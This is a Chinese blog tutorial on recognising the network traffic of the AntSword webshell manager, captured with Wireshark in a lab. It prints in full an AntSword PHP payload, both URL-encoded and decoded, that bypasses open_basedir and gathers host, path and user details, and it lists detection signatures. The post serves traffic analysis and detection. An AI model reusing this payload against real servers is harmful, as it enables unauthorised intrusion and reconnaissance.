蚁剑流量分析

最新推荐文章于 2024-03-06 11:00:00 发布
最新推荐文章于 2024-03-06 11:00:00 发布
阅读量4.8k 收藏 5
点赞数 7
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56937298/article/details/129933512
版权

蚁剑是什么 

        蚁剑(AntSword)是一款开源的跨平台WebShell管理工具

蚁剑流量特征两大特征

        1、默认的 user-agent 请求头是 antsword xxx(可修改)

        2、蚁剑的正文内容用URL加密,解密后流量最中明显的特征为ini_set("display_errors","0");

分析前准备工作

        本次我使用的是Wireshark进行捕捉

首先在靶机上写入一句话木马,使用蚁剑进行连接,连接的同时打开wireshark进行网卡监听。

 

        黑色的数据是蚁剑进行了多次的,原因是网络数据包未被ACK确认,为了避免数据丢失而进行错误恢复,出现重传原因有很多,服务器性能下降,网络数据拥塞,网络不稳定抖动,程序BUG,设备故障。因为此次传输时在局域网内部,可能是虚拟机的性能不好。(无伤大雅)

流量分析

        选择TCP追踪流

 查看是否存在两大特征

User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; it-it)AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27

请求头不是antsword xxx,再看其中内容

cmd=%40ini_set(%22display_errors%22%2C%20%220%22)%3B%40set_time_limit(0)%3B%24opdir%3D%40ini_get(%22open_basedir%22)%3Bif(%24opdir)%20%7B%24ocwd%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3B%24oparr%3Dpreg_split(base64_decode(%22Lzt8Oi8%3D%22)%2C%24opdir)%3B%40array_push(%24oparr%2C%24ocwd%2Csys_get_temp_dir())%3Bforeach(%24oparr%20as%20%24item)%20%7Bif(!%40is_writable(%24item))%7Bcontinue%3B%7D%3B%24tmdir%3D%24item.%22%2F.bfdd51934%22%3B%40mkdir(%24tmdir)%3Bif(!%40file_exists(%24tmdir))%7Bcontinue%3B%7D%24tmdir%3Drealpath(%24tmdir)%3B%40chdir(%24tmdir)%3B%40ini_set(%22open_basedir%22%2C%20%22..%22)%3B%24cntarr%3D%40preg_split(%22%2F%5C%5C%5C%5C%7C%5C%2F%2F%22%2C%24tmdir)%3Bfor(%24i%3D0%3B%24i%3Csizeof(%24cntarr)%3B%24i%2B%2B)%7B%40chdir(%22..%22)%3B%7D%3B%40ini_set(%22open_basedir%22%2C%22%2F%22)%3B%40rmdir(%24tmdir)%3Bbreak%3B%7D%3B%7D%3B%3Bfunction%20asenc(%24out)%7Breturn%20%24out%3B%7D%3Bfunction%20asoutput()%7B%24output%3Dob_get_contents()%3Bob_end_clean()%3Becho%20%22a2%22.%22e1a%22%3Becho%20%40asenc(%24output)%3Becho%20%225f%22.%22ee9%22%3B%7Dob_start()%3Btry%7B%24D%3Ddirname(%24_SERVER%5B%22SCRIPT_FILENAME%22%5D)%3Bif(%24D%3D%3D%22%22)%24D%3Ddirname(%24_SERVER%5B%22PATH_TRANSLATED%22%5D)%3B%24R%3D%22%7B%24D%7D%09%22%3Bif(substr(%24D%2C0%2C1)!%3D%22%2F%22)%7Bforeach(range(%22C%22%2C%22Z%22)as%20%24L)if(is_dir(%22%7B%24L%7D%3A%22))%24R.%3D%22%7B%24L%7D%3A%22%3B%7Delse%7B%24R.%3D%22%2F%22%3B%7D%24R.%3D%22%09%22%3B%24u%3D(function_exists(%22posix_getegid%22))%3F%40posix_getpwuid(%40posix_geteuid())%3A%22%22%3B%24s%3D(%24u)%3F%24u%5B%22name%22%5D%3A%40get_current_user()%3B%24R.%3Dphp_uname()%3B%24R.%3D%22%09%7B%24s%7D%22%3Becho%20%24R%3B%3B%7Dcatch(Exception%20%24e)%7Becho%20%22ERROR%3A%2F%2F%22.%24e-%3EgetMessage()%3B%7D%3Basoutput()%3Bdie()%3B

看到有%40就想到URL编码,随便找一个URL解码平台进行解码

cmd=@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.bfdd51934";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\\\|\//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};};;function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "a2"."e1a";echo @asenc($output);echo "5f"."ee9";}ob_start();try{$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}	";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.="	";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.="	{$s}";echo $R;;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();

查看其代码发现有多个危险函数使用,如@ini_set(“display_errors”,“0”)、dirname、get_current_user等,如果再文中发现其他编码的明显特征,要进行二次解码。

 总结

        查看请求头是否有明显的标识符,通过URL解码来查看报文中是否存在危险函数或者有@ini_set(“display_errors”,“0”)。

别内卷了
关注
  • 7
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
29-4 webshell 流量分析-
weixin_43263566的博客
03-22 124
上传木马到靶场之前讲过很多次了,这里就不多说了,使用连接木马。
启明HW-流量分析考题
04-24
本资源是启明星辰对于护网的考核题目,主要是流量分析方面的实战题目。
攻防兼备:中国使用指南及特征流量
最新发布
ZL_1618的博客
03-06 1383
这款工具在流量加密上特征比较明显,而且返回包多是明文,很容易在流量上就被查杀。!!接下来我将给各位同学划分一张学习计划表!
[玄机]流量特征分析-流量分析
haosha。的博客
01-31 2628
流量特征分析-流量分析题目做法及思路解析(个人分享)
、哥斯拉、菜刀、冰蝎(3.0/4.0)流量特征
qq_22792465的博客
07-25 1864
环境搭建:采用php一句话进行测试,可以用bp设置代理进行抓包查看,或使用wireshark进行过滤抓包逐步解析。
流量特征分析——、菜刀、冰蝎
Sgirll的博客
07-22 4254
通过对这三种常见的网络攻击工具流量特征的分析,我们可以更好地了解它们在网络流量中的表现。网络管理员和安全专家可以根据这些特征来识别和监测潜在的攻击活动,并及时采取相应的防护措施。同时,持续的学习和了解新兴攻击工具的流量特征也是保持网络安全的重要一环。本文将重点研究菜刀、和冰蝎这三种常见的网络攻击工具,分析它们在流量中留下的痕迹和特征,以便网络管理员和安全专家能够更好地识别和对抗这些工具所带来的潜在威胁。(AntSword)是一款功能强大的跨平台渗透测试工具,被广泛用于攻击和渗透测试活动。
菜刀、冰蝎、、哥斯拉的流量特征
热门推荐
eternitymd的博客
04-29 1万+
菜刀流量特征(最开始是明文传输,后来采用base64加密):PHP类WebShell链接流量 如下图: 第一:“eval”,eval函数用于执行传递的攻击payload,这是必不可少的; 第二:(base64_decode($_POST[z0])),(base64_decode($_POST[z0]))将攻击payload进行Base64解码,因为菜刀默认是使用Base64编码,以避免被检测; 第三:&z0=QGluaV9zZXQ...,该部分是传递攻击payload,此参数z0对应$_
Webshell之流量分析
qq_51323560的博客
05-15 2050
--------------------------------------------------------------------------------------------------------------------------------第一次学习webshell流量分析,还请大佬们多多指教。参数1,str参数是指将要进行截取字符操作的字符串。参数3, length参数是说明本次截取操作的长度,(2)分析发现真正有效的字符串是去除头部的2个字母。(3)查看虚拟终端执行的命令。
冰蝎、、哥斯拉的流量特征
qq_53218512的博客
06-11 3184
webshell管理工具,、冰蝎哥斯拉的流量特征
linux版本稳定版
12-30
适用于linux和kali系统,非常稳定
一道冰蝎文件流量分析的例题
09-01
一道冰蝎文件流量分析的例题
流量分析手册
01-13
渠道流量分析。。。。。。渠道流量分析。。。。。。渠道流量分析。。。。。。渠道流量分析。。。。。。渠道流量分析。。。。。。渠道流量分析。。。。。。渠道流量分析。。。。。。
zdj.rar_流量 分析_流量分析
09-22
网上流量分析系统
加密流量分析.pdf
02-23
迅猛增长的加密流量正不断改变着威胁形势。随着越来越多的企业实现全数字化,大量的服务和应 用都采用加密技术作为确保信息安全的首要方法。更具体地说,加密流量同比增长已超过 90%,对 流量进行加密的网站数量已...
流量分析工具Wireshark32.zip
05-28
流量分析工具Wireshark32.zip
中国流量分析
UserNick157的博客
04-25 5681
中国流量分析 文章目录中国流量分析1.代理2.测试连接数据包:执行代码:执行结果:3.双击连接第一个数据包数据包:第二个数据包数据包:执行代码:response:4.打开文件夹数据包:5.打开文件数据包:执行代码:6.修改文件1.修改小文件数据包:执行代码:2.修改大文件7.wget文件数据包执行代码:8.删除文件数据包:执行代码:9.上传文件1.数据包:执行代码:10.打开终端数据包执行代码:与相关功能模块源码部分知识点1.测试连接部分2.删除文件3.命令执行 1.代理 有设置代理的功能,
冰蝎与流量特征
08-19
冰蝎和都是常见的远程控制工具(RAT),它们在流量中有一些特征可以用来进行识别。 针对流量特征,一般而言,它的参数名大多以"_0x..."的形式出现,后面跟着加密的数据包。这种形式的参数名可以作为流量的一个明显特征。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [菜刀、冰蝎、、哥斯拉的流量特征](https://blog.csdn.net/eternitymd/article/details/124492261)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [2020明湖论PPT汇总(6份).zip - 工控安全](https://download.csdn.net/download/testvaevv/73182921)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [菜刀,,冰蝎,哥斯拉的流量特征](https://blog.csdn.net/qq_51550750/article/details/125607789)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值